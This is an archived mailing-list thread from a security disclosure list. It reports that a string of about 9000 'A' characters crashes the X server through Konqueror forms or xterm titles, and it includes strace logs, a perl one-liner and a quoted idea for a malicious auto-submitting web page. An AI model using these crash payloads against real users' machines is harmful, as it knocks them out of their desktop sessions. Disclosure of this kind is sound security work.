Re: Crashing X

From: KF (dotslash@snosoft.com)
Date: 01/01/04


Date: Thu, 31 Dec 1903 19:18:23 -0459
From: KF <dotslash@snosoft.com>
To: John Scimone <jscimone@cc.gatech.edu>

I reported a similar issue several months ago... I was seeing X crash
via xterm -title `perl -e 'print "A" x 9000'`
and also with html web pages with long title tags... Heres some strace
snippits. I am on a ppc linux box Mandrake 8.0

root 1927 1389 3 12:17 ? 00:00:03 /etc/X11/X -deferglyphs 16 -auth

[root@ibook root]# strace -o Xdebug.txt -ivfp 1715
1715 [0fea59dc] writev(11,
[{"\26\0)T\0@\2(\0@\2(\0\0\0\0\0\0\0\0\0\205\0\26\0\0\0\f"..., 224},
{"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 6000}], 2)
= 6224
1715 [0fe987d8] read(11,
"8\17\0\5\0@\1\222\0\10\0\10\0\0\177\377\0\0\0\0008@\0\4"..., 6624) = 6624
1715 [0fe9e980] brk(0x10617000) = 0x10617000
1715 [0fe987d8] read(11,
"\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A\0A"..., 9988) = 9988
1715 [1031f26c] --- SIGSEGV (Segmentation fault) ---

1715 [0fe091b0] rt_sigaction(SIGSEGV, {SIG_IGN}, {0x1003d664, [SEGV],
SA_RESTART}, 8) = 0
1715 [0fea577c] ipc_subcall(0, 0, 0, 0x30848000) = 0
1715 [0fe987e8] write(2, "\nFatal server error:\n", 21) = 21

This was a bit earlier on in the strace
1715 [0fe987d8] read(11,
"\24\0\0\6\2\0\0\16\0\0\0017\0\0\1\'\0\0\0\0\0\0\10\0", 6624) = 24
1715 [0fea59dc] writev(11, [{"\1\10)\26\0\0\10\0\0\0\1\'\0\0\3(\0\0
\0\0\0\0\0\177\377"..., 32}, {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...,
8192}], 2) = 8224
1715 [0fe987d8] read(11,
"\24\0\0\6\2\0\0\16\0\0\1;\0\0\0\4\0\0\0\0\0\0\10\0", 6624) = 24

And before that
1715 [0fe987d8] read(11,
"\24\0\0\6\2\0\0\16\0\0\0\'\0\0\0\37\0\0\0\0\0\0 \0", 6624) = 24
1715 [0fea59dc] writev(11,
[{"\1\10)\v\0\0\10\312\0\0\0\37\0\0\0\0\0\0#(\0\0\0\0\177"..., 32},
{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 9000}], 2) = 9032
1715 [0fea59dc] --- SIGALRM (Alarm clock) ---

and before that
1715 [0fe987d8] read(11,
"\24\0\0\6\2\0\0\16\0\0\0017\0\0\1\'\0\0\0\0\0\0\10\0", 6624) = 24
1715 [0fea59dc] writev(11, [{"\1\10)\6\0\0\10\0\0\0\1\'\0\0\3(\0\0
\0\0\0\0\0\177\377"..., 32}, {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...,
8192}], 2) = 8224

Then this is mme running xterm in the VERY begining.
1715 [0fe987d8] read(16,
"\24\0\0\6\2\0\0\16\0\0\0\"\0\0\0\37\0\0\0\0\0\0\'\20", 4096) = 24
1715 [0fea59dc] writev(16,
[{"\1\10\20\315\0\0\10\316\0\0\0\37\0\0\0\0\0\0#6\0\0\0\0"..., 32},
{"xterm\0-title\0AAAAAAAAAAAAAAAAAAA"..., 9014}, {"\0\0", 2}], 3) = 9048
BBBBBB

these are the X processes running
root 1389 1 0 12:13 ? 00:00:00 kdm
root 1927 1389 1 12:17 ? 00:00:08 /etc/X11/X -deferglyphs 16 -auth
/var/lib/kdm/authfiles/A:0-KE8CBg
root 1928 1389 0 12:17 ? 00:00:00 -:0
root 1945 1928 0 12:17 ? 00:00:00 /bin/sh /usr/bin/startkde
root 2027 1 0 12:17 ? 00:00:00 kdeinit: dcopserver --nosid
root 2030 1 0 12:17 ? 00:00:00 kdeinit: klauncher
root 2032 1 0 12:17 ? 00:00:00 kdeinit: kded
root 2038 1 0 12:17 ? 00:00:00 kdeinit: kxmlrpcd
root 2041 1 0 12:17 ? 00:00:00 /usr/bin/artsd -F 5 -S 4096 -b 8 -s 1 -m
artsmessage -l 3 -f
root 2046 1 0 12:18 ? 00:00:00 kdeinit: Running...
root 2056 1 0 12:18 ? 00:00:00 knotify
root 2057 1945 0 12:18 ? 00:00:00 ksmserver --restore
root 2058 2046 0 12:18 ? 00:00:00 kdeinit: kwin
root 2060 1 0 12:18 ? 00:00:01 kdeinit: kdesktop
root 2062 1 0 12:18 ? 00:00:01 kdeinit: kicker
root 2066 1 0 12:18 ? 00:00:00 kdeinit: klipper -icon klipper -miniicon
klipper
root 2069 1 0 12:18 ? 00:00:00 kdeinit: khotkeys
root 2070 1 0 12:18 ? 00:00:00 kdeinit: kwrited
root 2071 2046 1 12:18 ? 00:00:04 kdeinit: konsole -icon konsole.png
-miniicon konsole.png
root 2072 1 0 12:18 ? 00:00:00 alarmd
root 2073 2070 0 12:18 pts/0 00:00:00 /bin/cat

-KF

John Scimone wrote:

> If this is true couldn't a malicious website simply set the initial value of
> the form then use javascript to submit it upon loading the page causing the
> clients X to crash?
>
> ie.
>
> <input type="text" value="(9000 A's)">
>
> and have a body onload=document.forms[0].submit()?
>
> John Scimone
> CS Major @ Ga Tech
>
>
> On Friday 07 December 2001 04:26 pm, you wrote:
>
>> I have discovered a little bug in K Desktop 2.1.2 that crashes your X
>> Server.
>>
>> By using the konqueror web browser and inputting around 9000+ A's (or
>> whatever) into a search box (for instance www.yahoo.com's web search box) -
>> this will crash your X environment.
>>
>> I have successfully done it using 9000 A's on one search box (crashing X
>> instantly), then I used 90'000 and it also worked - but without immediate
>> effect (took a few seconds).
>>
>> It also sometimes seems to work by just pasting 900000 A's into a search
>> box and before it even displays the A's X crashes. (note: If you want it
>> to display the A's before X crashes paste 9000, then as soon as you click
>> to start the search - its bye bye X).
>>
>> Sorry but I can only test it on KDE 2.1.2, because I have no other systems
>> available right now.
>>
>> By the way:
>>
>> [smackenz@mainframe smackenz]$ uname -a
>> Linux mainframe 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
>> (Rehat 7.1)
>> (KDE 2.1.2)
>> (this works in Gnome and KDE using with the konqueror web browser)
>>
>> To test simply use a shell and type:
>>
>> perl -e 'print "A" x 9000'
>>
>> Then copy these, and paste them into a search form.
>>
>> Also I tried this in netscape and it didn't work so it suggests its a
>> konqueror error somewhere or other.
>>
>> Cheers
>>
>> Scott Mackenzie
>



Relevant Pages

  • [SLE] Crash on KDE logout
    ... I experienced several "crashes" when logout from KDE ... By "crash", I mean real crash: ...
    (SuSE)
  • Re: Crashing X
    ... > I have discovered a little bug in K Desktop 2.1.2 that crashes your X ... > By using the konqueror web browser and inputting around 9000+ A's (or ... > to display the A's before X crashes paste 9000, then as soon as you click ... > Sorry but I can only test it on KDE 2.1.2, because I have no other systems ...
    (Bugtraq)
  • Re: [kde] I just noticed: no more crashes! Thanks, KDE team!
    ... I then realized that I don't remember seeing any KDE applications ... crash in KDE 4.6 or now in 4.7. ... Kontact crashes daily here. ...
    (KDE)
  • Crashing X
    ... I have discovered a little bug in K Desktop 2.1.2 that crashes your X Server. ... By using the konqueror web browser and inputting around 9000+ A's (or ... display the A's before X crashes paste 9000, then as soon as you click to ... Sorry but I can only test it on KDE 2.1.2, because I have no other systems ...
    (Bugtraq)
  • Re: Why my KDE is so weak
    ... >> I am using debian ustable with kde 3.3. ... >> I am not curious to know the reasons why my kde often crashes. ... it's not a system crash if it's just kde & X Window ... video card: Geforce4 ...
    (Debian-User)